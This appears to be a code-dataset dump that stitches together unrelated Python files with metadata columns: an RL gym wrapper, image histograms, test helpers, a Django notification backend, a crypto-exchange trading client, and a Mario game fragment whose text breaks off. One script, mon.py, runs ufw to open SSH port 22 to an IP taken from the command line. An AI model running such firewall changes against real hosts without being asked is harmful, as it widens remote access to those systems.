elif hasattr(self.unwrapped_gym, 'robot'):
return self.unwrapped_gym.robot.calc_state()
else:
raise ValueError('Env id: {} is not supported for method get_state'.format(self.env_id))
@property
def unwrapped(self):
"""
:return: original unwrapped gym environment
:rtype: gym env
"""
return self._gym_env
@property
def unwrapped_gym(self):
"""
:return: gym environment, depend on attribute 'unwrapped'
:rtype: gym env
"""
if hasattr(self._gym_env, 'unwrapped'):
return self._gym_env.unwrapped
else:
return self._gym_env
@staticmethod
def _sample_with_nan(space: garage_space.Space):
"""
:param space: a 'Box'type space
:return: numpy clip of space that contains nan values
:rtype: np.ndarray
"""
assert isinstance(space, garage_space.Box)
high = np.ones_like(space.low)
low = -1 * np.ones_like(space.high)
return np.clip(np.random.uniform(low=low, high=high, size=space.low.shape),
a_min=space.low,
a_max=space.high)
def __str__(self):
return "<GymEnv instance> {}".format(self.env_id)
def get_lunarlander_state(env):
pos = env.unwrapped_gym.lander.position
vel = env.unwrapped_gym.lander.linearVelocity
fps = 50
scale = 30.0 # affects how fast-paced the game is, forces should be adjusted as well
leg_down = 18
viewport_w = 600
viewport_h = 400
state = [
(pos.x - viewport_w / scale / 2) / (viewport_w / scale / 2),
(pos.y - (env.unwrapped_gym.helipad_y + leg_down / scale)) / (viewport_h / scale / 2),
vel.x * (viewport_w / scale / 2) / fps,
vel.y * (viewport_h / scale / 2) / fps,
env.unwrapped_gym.lander.angle,
20.0 * env.unwrapped_gym.lander.angularVelocity / fps,
1.0 if env.unwrapped_gym.legs[0].ground_contact else 0.0,
1.0 if env.unwrapped_gym.legs[1].ground_contact else 0.0
]
return np.array(state, dtype=np.float32)
specialEnv = {
'LunarLander-v2': get_lunarlander_state
}
| <filename>baconian/envs/gym_env.py
from baconian.core.core import Env, EnvSpec
import gym.envs
from gym.envs.registration import registry
# do not remove the following import statements
import pybullet
import pybullet_envs
have_mujoco_flag = True
try:
from gym.envs.mujoco import mujoco_env
except Exception:
have_mujoco_flag = False
import numpy as np
import types
import gym.spaces as GymSpace
import baconian.common.spaces as garage_space
import gym.error as gym_error
_env_inited_count = dict()
def make(gym_env_id: str, allow_multiple_env=True):
"""
:param gym_env_id: gym environment id
:type gym_env_id: int
:param allow_multiple_env: allow multiple environments, by default True
:type allow_multiple_env: bool
:return: new gym environment
:rtype: GymEnv
"""
if allow_multiple_env is True:
if gym_env_id not in _env_inited_count:
_env_inited_count[gym_env_id] = 0
else:
_env_inited_count[gym_env_id] += 1
return GymEnv(gym_env_id, name='{}_{}'.format(gym_env_id, _env_inited_count[gym_env_id]))
else:
return GymEnv(gym_env_id)
def space_converter(space: GymSpace.Space):
"""
Convert space into any one of "Box", "Discrete", or "Tuple" type.
:param space: space of gym environment
:type space: GymSpace
:return: converted space
:rtype: Box, Discrete, or Tuple
"""
if isinstance(space, GymSpace.Box):
return garage_space.Box(low=space.low, high=space.high)
elif isinstance(space, GymSpace.Dict):
return garage_space.Dict(space.spaces)
elif isinstance(space, GymSpace.Discrete):
return garage_space.Discrete(space.n)
elif isinstance(space, GymSpace.Tuple):
return garage_space.Tuple(list(map(space_converter, space.spaces)))
else:
raise NotImplementedError
class GymEnv(Env):
"""
Gym environment wrapping module
"""
_all_gym_env_id = list(registry.env_specs.keys())
def __init__(self, gym_env_id: str, name: str = None):
"""
:param gym_env_id: gym environment id
:type gym_env_id: str
:param name: name of the gym environment instance
:type name: str
"""
super().__init__(name=name if name else gym_env_id)
self.env_id = gym_env_id
try:
self._gym_env = gym.make(gym_env_id)
except gym_error.UnregisteredEnv:
raise ValueError('Env id: {} is not supported currently'.format(gym_env_id))
self._gym_env = gym.make(gym_env_id)
self.action_space = space_converter(self._gym_env.action_space)
self.observation_space = space_converter(self._gym_env.observation_space)
if isinstance(self.action_space, garage_space.Box):
self.action_space.low = np.nan_to_num(self.action_space.low)
self.action_space.high = np.nan_to_num(self.action_space.high)
self.action_space.sample = types.MethodType(self._sample_with_nan, self.action_space)
if isinstance(self.observation_space, garage_space.Box):
self.observation_space.low = np.nan_to_num(self.observation_space.low)
self.observation_space.high = np.nan_to_num(self.observation_space.high)
self.observation_space.sample = types.MethodType(self._sample_with_nan, self.observation_space)
self.env_spec = EnvSpec(obs_space=self.observation_space,
action_space=self.action_space)
self.reward_range = self._gym_env.reward_range
def step(self, action):
"""
:param action: action to be taken by agent in the environment
:type action: action to be taken by agent in the environment
:return: step of the unwrapped environment
:rtype: gym env
"""
super().step(action)
action = self.env_spec.flat_action(action)
state, re, done, info = self.unwrapped.step(action=action)
return state, re, bool(done), info
def reset(self):
"""
Reset the gym environment.
:return:
"""
super().reset()
return self.unwrapped.reset()
def init(self):
"""
Initialize the gym environment.
:return:
"""
super().init()
return self.reset()
def seed(self, seed=None):
"""
:param seed: seed of random number generalization
:type seed: int
:return: seed of the unwrapped environment
:rtype: int
"""
return super().seed(seed)
def get_state(self):
"""
:return:the state of unwrapped gym environment
:rtype: np.ndarray
"""
if (have_mujoco_flag is True and isinstance(self.unwrapped_gym, mujoco_env.MujocoEnv)) or (
hasattr(self.unwrapped_gym, '_get_obs') and callable(self.unwrapped_gym._get_obs)):
return self.unwrapped_gym._get_obs()
elif hasattr(self.unwrapped_gym, '_get_ob') and callable(self.unwrapped_gym._get_ob):
return self.unwrapped_gym._get_ob()
elif hasattr(self.unwrapped_gym, 'state'):
return self.unwrapped_gym.state if isinstance(self.unwrapped_gym.state, np.ndarray) else np.array(
self.unwrapped_gym.state)
elif hasattr(self.unwrapped_gym, 'observation'):
return self.unwrapped_gym.observation if isinstance(self.unwrapped_gym.observation,
np.ndarray) else np.array(
self.unwrapped_gym.state)
elif hasattr(self.unwrapped_gym, 'spec') and hasattr(self.unwrapped_gym.spec,
'id') and self.unwrapped_gym.spec.id in specialEnv:
return specialEnv[self.unwrapped_gym.spec.id](self)
elif hasattr(self.unwrapped_gym, 'robot'):
return self.unwrapped_gym.robot.calc_state()
else:
raise ValueError('Env id: {} is not supported for method get_state'.format(self.env_id))
@property
def unwrapped(self):
"""
:return: original unwrapped gym environment
:rtype: gym env
"""
return self._gym_env
@property
def unwrapped_gym(self):
"""
:return: gym environment, depend on attribute 'unwrapped'
:rtype: gym env
"""
if hasattr(self._gym_env, 'unwrapped'):
return self._gym_env.unwrapped
else:
return self._gym_env
@staticmethod
def _sample_with_nan(space: garage_space.Space):
"""
:param space: a 'Box'type space
:return: numpy clip of space that contains nan values
:rtype: np.ndarray
"""
assert isinstance(space, garage_space.Box)
high = np.ones_like(space.low)
low = -1 * np.ones_like(space.high)
return np.clip(np.random.uniform(low=low, high=high, size=space.low.shape),
a_min=space.low,
a_max=space.high)
def __str__(self):
return "<GymEnv instance> {}".format(self.env_id)
def get_lunarlander_state(env):
pos = env.unwrapped_gym.lander.position
vel = env.unwrapped_gym.lander.linearVelocity
fps = 50
scale = 30.0 # affects how fast-paced the game is, forces should be adjusted as well
leg_down = 18
viewport_w = 600
viewport_h = 400
state = [
(pos.x - viewport_w / scale / 2) / (viewport_w / scale / 2),
(pos.y - (env.unwrapped_gym.helipad_y + leg_down / scale)) / (viewport_h / scale / 2),
vel.x * (viewport_w / scale / 2) / fps,
vel.y * (viewport_h / scale / 2) / fps,
env.unwrapped_gym.lander.angle,
20.0 * env.unwrapped_gym.lander.angularVelocity / fps,
1.0 if env.unwrapped_gym.legs[0].ground_contact else 0.0,
1.0 if env.unwrapped_gym.legs[1].ground_contact else 0.0
]
return np.array(state, dtype=np.float32)
specialEnv = {
'LunarLander-v2': get_lunarlander_state
}
| en | 0.735588 | # do not remove the following import statements :param gym_env_id: gym environment id :type gym_env_id: int :param allow_multiple_env: allow multiple environments, by default True :type allow_multiple_env: bool :return: new gym environment :rtype: GymEnv Convert space into any one of "Box", "Discrete", or "Tuple" type. :param space: space of gym environment :type space: GymSpace :return: converted space :rtype: Box, Discrete, or Tuple Gym environment wrapping module :param gym_env_id: gym environment id :type gym_env_id: str :param name: name of the gym environment instance :type name: str :param action: action to be taken by agent in the environment :type action: action to be taken by agent in the environment :return: step of the unwrapped environment :rtype: gym env Reset the gym environment. :return: Initialize the gym environment. :return: :param seed: seed of random number generalization :type seed: int :return: seed of the unwrapped environment :rtype: int :return:the state of unwrapped gym environment :rtype: np.ndarray :return: original unwrapped gym environment :rtype: gym env :return: gym environment, depend on attribute 'unwrapped' :rtype: gym env :param space: a 'Box'type space :return: numpy clip of space that contains nan values :rtype: np.ndarray # affects how fast-paced the game is, forces should be adjusted as well | 2.248348 | 2 |
python/mon.py | pthub/sysdig | 0 | 6613963 | <filename>python/mon.py
#!/usr/bin/python
import os
import time
import smtplib
from subprocess import call
import sys
import socket
def check_ip(IP):
try:
socket.inet_aton(IP)
return True
except socket.error:
return False
def send_email(IP):
#add the sender email address
mailersender = ""
#add the sender password
mailerpass = ""
#add the receiver email address
mailerreceiver = ""
# Prepare actual message
message = """\From: %s\nTo: %s\nSubject: %s-%s\n\n
""" % (mailersender, ", ".join(mailerreceiver), 'event-', IP)
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(mailersender, mailerpass)
server.sendmail(mailersender, mailerreceiver, message)
server.close()
print 'successfully sent the mail'
except:
print "failed to send mail"
if check_ip(sys.argv[1]):
call(["ufw", "allow", "from", sys.argv[1], "to", "any", "port", "22"])
send_email(sys.argv[1])
| <filename>python/mon.py
#!/usr/bin/python
import os
import time
import smtplib
from subprocess import call
import sys
import socket
def check_ip(IP):
try:
socket.inet_aton(IP)
return True
except socket.error:
return False
def send_email(IP):
#add the sender email address
mailersender = ""
#add the sender password
mailerpass = ""
#add the receiver email address
mailerreceiver = ""
# Prepare actual message
message = """\From: %s\nTo: %s\nSubject: %s-%s\n\n
""" % (mailersender, ", ".join(mailerreceiver), 'event-', IP)
try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(mailersender, mailerpass)
server.sendmail(mailersender, mailerreceiver, message)
server.close()
print 'successfully sent the mail'
except:
print "failed to send mail"
if check_ip(sys.argv[1]):
call(["ufw", "allow", "from", sys.argv[1], "to", "any", "port", "22"])
send_email(sys.argv[1])
| en | 0.379657 | #!/usr/bin/python #add the sender email address #add the sender password #add the receiver email address # Prepare actual message \From: %s\nTo: %s\nSubject: %s-%s\n\n | 2.76576 | 3 |
gibberish/histogram.py | elmadjian/pyvision | 0 | 6613964 | import cv2, sys, file_handler
import numpy as np
import matplotlib.pyplot as plt
class Histogram():
def __init__(self):
self.img = file_handler.open_image(sys.argv)
self.gray_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
self.histogram = None
def standard_grayscale_histogram(self, N):
h = [0 for i in range(N)]
for row in self.gray_img:
for intensity in row:
h[intensity] += 1
self.histogram = h
return h
def relative_f_grayscale_histogram(self, N):
rows = self.gray_img.shape[0]
cols = self.gray_img.shape[1]
h = self.standard_grayscale_histogram(N)
h = [i/(rows*cols) for i in h]
self.histogram = h
return h
def equalized_grayscale_histogram(self, N):
h = self.relative_f_grayscale_histogram(N)
f = [0 for i in range(N)]
sum = 0
for i in range(N):
sum += h[i]
f[i] = round(sum * (N-1))
self.histogram = f
return f
def plot_histogram(self):
plt.plot(self.histogram)
plt.ylabel("frequency")
plt.show()
if __name__ == "__main__":
h = Histogram()
# h.standard_grayscale_histogram()
# h.plot_histogram()
# h.relative_f_grayscale_histogram()
# h.plot_histogram()
# h.equalized_grayscale_histogram(256)
# h.plot_histogram()
| import cv2, sys, file_handler
import numpy as np
import matplotlib.pyplot as plt
class Histogram():
def __init__(self):
self.img = file_handler.open_image(sys.argv)
self.gray_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
self.histogram = None
def standard_grayscale_histogram(self, N):
h = [0 for i in range(N)]
for row in self.gray_img:
for intensity in row:
h[intensity] += 1
self.histogram = h
return h
def relative_f_grayscale_histogram(self, N):
rows = self.gray_img.shape[0]
cols = self.gray_img.shape[1]
h = self.standard_grayscale_histogram(N)
h = [i/(rows*cols) for i in h]
self.histogram = h
return h
def equalized_grayscale_histogram(self, N):
h = self.relative_f_grayscale_histogram(N)
f = [0 for i in range(N)]
sum = 0
for i in range(N):
sum += h[i]
f[i] = round(sum * (N-1))
self.histogram = f
return f
def plot_histogram(self):
plt.plot(self.histogram)
plt.ylabel("frequency")
plt.show()
if __name__ == "__main__":
h = Histogram()
# h.standard_grayscale_histogram()
# h.plot_histogram()
# h.relative_f_grayscale_histogram()
# h.plot_histogram()
# h.equalized_grayscale_histogram(256)
# h.plot_histogram()
| en | 0.277368 | # h.standard_grayscale_histogram() # h.plot_histogram() # h.relative_f_grayscale_histogram() # h.plot_histogram() # h.equalized_grayscale_histogram(256) # h.plot_histogram() | 3.224055 | 3 |
tests/core/asyncio/helpers.py | lithp/lahja | 0 | 6613965 | from typing import Any, Callable, Set, Type # noqa: F401,
from cytoolz import curry
from lahja import BaseEvent, BaseRequestResponseEvent
class DummyRequest(BaseEvent):
property_of_dummy_request = None
class DummyResponse(BaseEvent):
property_of_dummy_response = None
def __init__(self, something):
pass
class DummyRequestPair(BaseRequestResponseEvent[DummyResponse]):
property_of_dummy_request_pair = None
@staticmethod
def expected_response_type():
return DummyResponse
class Tracker:
def __init__(self):
self._tracker = set()
def exists(self, track_id):
return track_id in self._tracker
def track_and_run(self, track_id, continue_fn):
"""
Add ``track_id`` to the internal accounting and continue with ``continue_fn``
"""
self._tracker.add(track_id)
return continue_fn()
@curry
def track_and_broadcast_dummy(self, track_id, endpoint, ev):
self.track_and_run(
track_id,
lambda: endpoint.broadcast_nowait(
DummyResponse(ev.property_of_dummy_request_pair), ev.broadcast_config()
),
)
| from typing import Any, Callable, Set, Type # noqa: F401,
from cytoolz import curry
from lahja import BaseEvent, BaseRequestResponseEvent
class DummyRequest(BaseEvent):
property_of_dummy_request = None
class DummyResponse(BaseEvent):
property_of_dummy_response = None
def __init__(self, something):
pass
class DummyRequestPair(BaseRequestResponseEvent[DummyResponse]):
property_of_dummy_request_pair = None
@staticmethod
def expected_response_type():
return DummyResponse
class Tracker:
def __init__(self):
self._tracker = set()
def exists(self, track_id):
return track_id in self._tracker
def track_and_run(self, track_id, continue_fn):
"""
Add ``track_id`` to the internal accounting and continue with ``continue_fn``
"""
self._tracker.add(track_id)
return continue_fn()
@curry
def track_and_broadcast_dummy(self, track_id, endpoint, ev):
self.track_and_run(
track_id,
lambda: endpoint.broadcast_nowait(
DummyResponse(ev.property_of_dummy_request_pair), ev.broadcast_config()
),
)
| en | 0.790277 | # noqa: F401, Add ``track_id`` to the internal accounting and continue with ``continue_fn`` | 2.068951 | 2 |
opbeatcli/deployment/packages/rpm.py | opbeat/opbeatcli | 1 | 6613966 | from opbeatcli.exceptions import DependencyParseError
from .base import BaseDependency, BaseDependencyCollector
from .types import RPM_PACKAGE
class RPMCollector(BaseDependencyCollector):
default_commands = [
r"rpm --query --all --queryformat='%{NAME} %{VERSION}%{RELEASE}\n'"
]
def parse(self, output):
for line in output.splitlines():
try:
name, version = line.split()
except ValueError:
raise DependencyParseError(line)
yield RPMDependency(name=name, version=version)
class RPMDependency(BaseDependency):
package_type = RPM_PACKAGE
| from opbeatcli.exceptions import DependencyParseError
from .base import BaseDependency, BaseDependencyCollector
from .types import RPM_PACKAGE
class RPMCollector(BaseDependencyCollector):
default_commands = [
r"rpm --query --all --queryformat='%{NAME} %{VERSION}%{RELEASE}\n'"
]
def parse(self, output):
for line in output.splitlines():
try:
name, version = line.split()
except ValueError:
raise DependencyParseError(line)
yield RPMDependency(name=name, version=version)
class RPMDependency(BaseDependency):
package_type = RPM_PACKAGE
| none | 1 | 2.248722 | 2 | |
Operating and Distributed Systems (Python)/Banking System with RPC (centralised)/ServerLibs/DataBase/globalLock.py | PFigs/portfolio | 0 | 6613967 | <reponame>PFigs/portfolio<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The global lock preserves corectness of transactions by deducting money
only when available. This allows the database to be multithreaded and
accept requests concurrently.
"""
from threading import Lock
class GlobalLock:
def __init__( self ):
self.__entitys = {}
self.__lock = None
def Close( self ):
pass
def acquire( self, entity, Id ):
if self.__lock is None:
self.__lock = Lock()
self.__lock.acquire()
token = self.__Read( entity, Id, True)
token[1] += 1
self.__lock.release()
token[0].acquire()
token[1] -= 1
def release( self, entity, Id ):
if self.__lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
self.__lock.acquire()
lock = self.__Read( entity, Id, False )
if self.__lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
self.__lock.release()
if lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
lock.release()
if not self.__entitys:
print 'QUER APAGAR LOCK', Id
# temp = self.__lock
# self.__lock = None
# del temp
def __Read( self, entity, Id, Assign ):
entityName = str( entity )
entityId = str( id(entity) )
entity = self.__entitys.get( entityId, None )
if entity is None:
if Assign:
self.__entitys[ entityId ] = {}
entity = self.__entitys[ entityId ]
else:
raise ValueError( "The entity provided does not have any lock assigned: "+entityName )
token = entity.get( str( Id ), None )
if token is None:
if Assign:
entity[ str( Id ) ] = [ Lock(), 0 ]
token = entity[ str( Id ) ]
else:
raise ValueError( "The id provided does not have a lock assigned: "+str(Id)+" from "+entityName )
if not Assign:
waiting = token[1]
token = token[0]
if waiting is 0:
temp = entity.pop( str(Id) )
del temp
if not entity:
temp = self.__entitys.pop( entityId )
del temp
return token
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The global lock preserves corectness of transactions by deducting money
only when available. This allows the database to be multithreaded and
accept requests concurrently.
"""
from threading import Lock
class GlobalLock:
def __init__( self ):
self.__entitys = {}
self.__lock = None
def Close( self ):
pass
def acquire( self, entity, Id ):
if self.__lock is None:
self.__lock = Lock()
self.__lock.acquire()
token = self.__Read( entity, Id, True)
token[1] += 1
self.__lock.release()
token[0].acquire()
token[1] -= 1
def release( self, entity, Id ):
if self.__lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
self.__lock.acquire()
lock = self.__Read( entity, Id, False )
if self.__lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
self.__lock.release()
if lock is None:
raise ValueError( 'Impossible to make a release account '+str(Id) )
lock.release()
if not self.__entitys:
print 'QUER APAGAR LOCK', Id
# temp = self.__lock
# self.__lock = None
# del temp
def __Read( self, entity, Id, Assign ):
entityName = str( entity )
entityId = str( id(entity) )
entity = self.__entitys.get( entityId, None )
if entity is None:
if Assign:
self.__entitys[ entityId ] = {}
entity = self.__entitys[ entityId ]
else:
raise ValueError( "The entity provided does not have any lock assigned: "+entityName )
token = entity.get( str( Id ), None )
if token is None:
if Assign:
entity[ str( Id ) ] = [ Lock(), 0 ]
token = entity[ str( Id ) ]
else:
raise ValueError( "The id provided does not have a lock assigned: "+str(Id)+" from "+entityName )
if not Assign:
waiting = token[1]
token = token[0]
if waiting is 0:
temp = entity.pop( str(Id) )
del temp
if not entity:
temp = self.__entitys.pop( entityId )
del temp
return token | en | 0.804189 | #!/usr/bin/env python # -*- coding: utf-8 -*- The global lock preserves corectness of transactions by deducting money only when available. This allows the database to be multithreaded and accept requests concurrently. # temp = self.__lock # self.__lock = None # del temp | 3.378925 | 3 |
Lib/site-packages/django_notifications/backends/__init__.py | jiangyifan123/EngLearner | 0 | 6613968 | <filename>Lib/site-packages/django_notifications/backends/__init__.py
import sys
from django.conf import settings
BACKEND_CLASSES = {
'email': 'django_notifications.backends.email.EmailBackend',
'xmpp': 'django_notifications.backends.xmpp.XMPPBackend',
'sms_mobitel': 'django_notifications.backends.sms_mobitel.SMSMobitelBackend',
'postmark': 'django_notifications.backends.postmark.PostmarkBackend',
}
def get_available_backends(configured_only = False):
"""
Returns a list of all the available backends.
If configured_only = True only those backends which are
properly configured are returned.
"""
available_backends = []
for key in BACKEND_CLASSES.keys():
module_name = get_module_and_class_name(BACKEND_CLASSES[key])[0]
class_instance = get_class_instance_by_key(key)
module = sys.modules[module_name]
try:
not_available = getattr(module, 'not_available')
except AttributeError:
not_available = None
is_configured = getattr(class_instance, 'is_configured', False)()
meta = getattr(class_instance, 'meta', None)
if not meta or (configured_only and not is_configured) \
or (configured_only and not_available):
continue
name = meta['NAME']
description = meta['DESCRIPTION']
available_backends.append((key, name, description))
return available_backends
def get_settings(backend_key, use_default = True):
"""
Returns all the settings for the provided backend key.
"""
notification_settings = getattr(settings, 'NOTIFICATIONS', None)
if not BACKEND_CLASSES.get(backend_key, None):
raise EnvironmentError('Invalid backend: %s' % (backend_key))
if not notification_settings:
raise EnvironmentError('NOTIFICATIONS was not found.')
# Default backend settings
if use_default:
module_name = get_module_and_class_name(BACKEND_CLASSES[backend_key])[0]
__import__(module_name)
module = sys.modules[module_name]
backend_settings = getattr(module, 'SETTINGS')['required']
else:
backend_settings = {}
try:
backend_settings.update(notification_settings[backend_key])
except KeyError:
pass
return backend_settings
# "Helper" methods
def get_module_and_class_name(class_path):
module_name = class_path[:class_path.rfind('.')]
class_name = class_path[class_path.rfind('.') + 1:]
return module_name, class_name
def get_class_instance_by_key(key):
try:
class_path = BACKEND_CLASSES[key]
except KeyError:
return None
module_name, class_name = get_module_and_class_name(class_path)
__import__(module_name)
module = sys.modules[module_name]
class_instance = getattr(module, class_name)()
return class_instance | <filename>Lib/site-packages/django_notifications/backends/__init__.py
import sys
from django.conf import settings
BACKEND_CLASSES = {
'email': 'django_notifications.backends.email.EmailBackend',
'xmpp': 'django_notifications.backends.xmpp.XMPPBackend',
'sms_mobitel': 'django_notifications.backends.sms_mobitel.SMSMobitelBackend',
'postmark': 'django_notifications.backends.postmark.PostmarkBackend',
}
def get_available_backends(configured_only = False):
"""
Returns a list of all the available backends.
If configured_only = True only those backends which are
properly configured are returned.
"""
available_backends = []
for key in BACKEND_CLASSES.keys():
module_name = get_module_and_class_name(BACKEND_CLASSES[key])[0]
class_instance = get_class_instance_by_key(key)
module = sys.modules[module_name]
try:
not_available = getattr(module, 'not_available')
except AttributeError:
not_available = None
is_configured = getattr(class_instance, 'is_configured', False)()
meta = getattr(class_instance, 'meta', None)
if not meta or (configured_only and not is_configured) \
or (configured_only and not_available):
continue
name = meta['NAME']
description = meta['DESCRIPTION']
available_backends.append((key, name, description))
return available_backends
def get_settings(backend_key, use_default = True):
"""
Returns all the settings for the provided backend key.
"""
notification_settings = getattr(settings, 'NOTIFICATIONS', None)
if not BACKEND_CLASSES.get(backend_key, None):
raise EnvironmentError('Invalid backend: %s' % (backend_key))
if not notification_settings:
raise EnvironmentError('NOTIFICATIONS was not found.')
# Default backend settings
if use_default:
module_name = get_module_and_class_name(BACKEND_CLASSES[backend_key])[0]
__import__(module_name)
module = sys.modules[module_name]
backend_settings = getattr(module, 'SETTINGS')['required']
else:
backend_settings = {}
try:
backend_settings.update(notification_settings[backend_key])
except KeyError:
pass
return backend_settings
# "Helper" methods
def get_module_and_class_name(class_path):
module_name = class_path[:class_path.rfind('.')]
class_name = class_path[class_path.rfind('.') + 1:]
return module_name, class_name
def get_class_instance_by_key(key):
try:
class_path = BACKEND_CLASSES[key]
except KeyError:
return None
module_name, class_name = get_module_and_class_name(class_path)
__import__(module_name)
module = sys.modules[module_name]
class_instance = getattr(module, class_name)()
return class_instance | en | 0.81538 | Returns a list of all the available backends. If configured_only = True only those backends which are properly configured are returned. Returns all the settings for the provided backend key. # Default backend settings # "Helper" methods | 2.027084 | 2 |
hotbit/trade/trade.py | a-parida12/hotbit-python | 1 | 6613969 | from hotbit.base_request.base_request import HotbitBaseRestApi
import json
from typing import List
class TradeData(HotbitBaseRestApi):
def __init__(
self, key: str, secret: str, url: str = "https://api.hotbit.io", api_level: int = 2
):
super().__init__(key=key, secret=secret, url=url, api_level=api_level)
self.api_key = key
self.secret_key = secret
def create_limit_order(self, symbol: str, side: str, size: float, price: float) -> dict:
"""
:param symbol: a valid trading symbol code (Mandatory)
:type: str
:param side: place direction buy or sell (Mandatory)
:type: str
:param size: amount of base currency to buy or sell (Mandatory)
:type: float
:param price: price per base currency (Mandatory)
:type: float
:return: {
"error": null,
"result":
{
"id":8688803, #order-ID
"market":"ETHBTC",
"source":"web", #The source identification of data request
"type":1, #Type of order pladement 1-limit order
"side":2, #Identification of buyers and sellers 1-Seller,2-buyer
"user":15731,
"ctime":1526971722.164765, #Time of order establishment(second)
"mtime":1526971722.164765, #Time of order update(second)
"price":"0.080003",
"amount":"0.4",
"taker_fee":"0.0025",
"maker_fee":"0",
"left":"0.4",
"deal_stock":"0",
"deal_money":"0",
"deal_fee":"0",
"status":0,
"fee_stock":"HTB", #Name of deductable token
"alt_fee":"0.5", #The discount of deductable tokens
"deal_fee_alt":"0.123" #Amount deducted
},
"id": 1521169460
}
"""
assert side in ["buy", "sell"], "use side as 'buy' or 'sell' "
params = {
"api_key": self.api_key,
"market": symbol,
"side": 2 if side == "buy" else 1,
"amount": size,
"price": price,
"isfee": 0,
}
self._set_permission_level(2)
return self._request(
method="POST", uri="order.put_limit", params=params, timeout=5, auth=True
)
def get_balances(self, symbols: List[str]) -> dict:
"""
:param symbols: symbols (Mandatory)
:type: list
:return:
{
'USDT': {
'available': '20.38121558',
'freeze': '0'
},
'BTC': {
'available': '0.00000000',
'freeze': '0'
}
}
"""
self._set_permission_level(2)
default_return = {"available": "0.00000000", "freeze": "0"}
params = {"api_key": self.api_key, "assets": json.dumps(symbols)}
result = self._request(method="GET", uri="balance.query", params=params, auth=True)
for symbol in symbols:
result.setdefault(symbol, default_return)
return result
| from hotbit.base_request.base_request import HotbitBaseRestApi
import json
from typing import List
class TradeData(HotbitBaseRestApi):
def __init__(
self, key: str, secret: str, url: str = "https://api.hotbit.io", api_level: int = 2
):
super().__init__(key=key, secret=secret, url=url, api_level=api_level)
self.api_key = key
self.secret_key = secret
def create_limit_order(self, symbol: str, side: str, size: float, price: float) -> dict:
"""
:param symbol: a valid trading symbol code (Mandatory)
:type: str
:param side: place direction buy or sell (Mandatory)
:type: str
:param size: amount of base currency to buy or sell (Mandatory)
:type: float
:param price: price per base currency (Mandatory)
:type: float
:return: {
"error": null,
"result":
{
"id":8688803, #order-ID
"market":"ETHBTC",
"source":"web", #The source identification of data request
"type":1, #Type of order pladement 1-limit order
"side":2, #Identification of buyers and sellers 1-Seller,2-buyer
"user":15731,
"ctime":1526971722.164765, #Time of order establishment(second)
"mtime":1526971722.164765, #Time of order update(second)
"price":"0.080003",
"amount":"0.4",
"taker_fee":"0.0025",
"maker_fee":"0",
"left":"0.4",
"deal_stock":"0",
"deal_money":"0",
"deal_fee":"0",
"status":0,
"fee_stock":"HTB", #Name of deductable token
"alt_fee":"0.5", #The discount of deductable tokens
"deal_fee_alt":"0.123" #Amount deducted
},
"id": 1521169460
}
"""
assert side in ["buy", "sell"], "use side as 'buy' or 'sell' "
params = {
"api_key": self.api_key,
"market": symbol,
"side": 2 if side == "buy" else 1,
"amount": size,
"price": price,
"isfee": 0,
}
self._set_permission_level(2)
return self._request(
method="POST", uri="order.put_limit", params=params, timeout=5, auth=True
)
def get_balances(self, symbols: List[str]) -> dict:
"""
:param symbols: symbols (Mandatory)
:type: list
:return:
{
'USDT': {
'available': '20.38121558',
'freeze': '0'
},
'BTC': {
'available': '0.00000000',
'freeze': '0'
}
}
"""
self._set_permission_level(2)
default_return = {"available": "0.00000000", "freeze": "0"}
params = {"api_key": self.api_key, "assets": json.dumps(symbols)}
result = self._request(method="GET", uri="balance.query", params=params, auth=True)
for symbol in symbols:
result.setdefault(symbol, default_return)
return result
| en | 0.523864 | :param symbol: a valid trading symbol code (Mandatory) :type: str :param side: place direction buy or sell (Mandatory) :type: str :param size: amount of base currency to buy or sell (Mandatory) :type: float :param price: price per base currency (Mandatory) :type: float :return: { "error": null, "result": { "id":8688803, #order-ID "market":"ETHBTC", "source":"web", #The source identification of data request "type":1, #Type of order pladement 1-limit order "side":2, #Identification of buyers and sellers 1-Seller,2-buyer "user":15731, "ctime":1526971722.164765, #Time of order establishment(second) "mtime":1526971722.164765, #Time of order update(second) "price":"0.080003", "amount":"0.4", "taker_fee":"0.0025", "maker_fee":"0", "left":"0.4", "deal_stock":"0", "deal_money":"0", "deal_fee":"0", "status":0, "fee_stock":"HTB", #Name of deductable token "alt_fee":"0.5", #The discount of deductable tokens "deal_fee_alt":"0.123" #Amount deducted }, "id": 1521169460 } :param symbols: symbols (Mandatory) :type: list :return: { 'USDT': { 'available': '20.38121558', 'freeze': '0' }, 'BTC': { 'available': '0.00000000', 'freeze': '0' } } | 2.766735 | 3 |
src/collision_x.py | NishanthRachakonda/mario-bash | 0 | 6613970 | <filename>src/collision_x.py
import os
class Collision_horizontal(object):
"""Class to check x-axis collisions."""
def __init__(self):
pass
def check(self, dir, mario, pipes, boxes):
return (self.pipes(dir, mario, pipes) or self.boxes(dir, mario, boxes))
def pipes(self, dir, mario, pipes):
ans = False
for single_pipe in pipes:
ans = (ans or self.pipe(dir, mario, single_pipe))
return ans
def pipe(self, dir, mario, single_pipe):
if dir == 1 and mario.x + 2 < single_pipe.x and \
mario.x + 2 + mario.vel >= single_pipe.x and \
mario.y > single_pipe.h:
return True
elif dir == -1 and mario.x > single_pipe.x + 5 and \
mario.x - mario.vel <= single_pipe.x + 5 and \
mario.y > single_pipe.h:
return True
else:
return False
def boxes(self, dir, mario, boxes):
ans = False
for brick in boxes:
ans = (ans or self.brick(dir, mario, brick[0]))
return ans
def brick(self, dir, mario, brick):
if dir == 1 and mario.x + 2 < brick.x and \
mario.x + 2 + mario.vel >= brick.x and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
elif dir == -1 and mario.x > brick.x + 9 and \
mario.x - mario.vel <= brick.x + 9 and mario.y > brick.y and \
mario.y < brick.y + 2:
return True
else:
return False
def tort(self, mario, set_tort, win):
for tortise in set_tort:
